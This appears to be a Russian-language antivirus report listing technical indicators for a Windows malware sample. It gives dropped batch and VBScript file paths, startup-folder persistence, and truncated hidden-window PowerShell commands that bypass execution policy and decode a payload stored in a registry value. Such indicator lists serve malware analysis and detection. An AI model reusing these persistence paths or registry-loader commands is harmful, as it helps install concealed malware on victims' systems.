Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\sys.bat
- %TEMP%\ee.vbs
- %TEMP%\sys.bat
- '<SYSTEM32>\wscript.exe' %TEMP%\ee.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('?%¨µ£','0');[byte[]]$_0 = [System.Co...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('?%¨µ£','0');[byte[]]$_0 = [System.Co...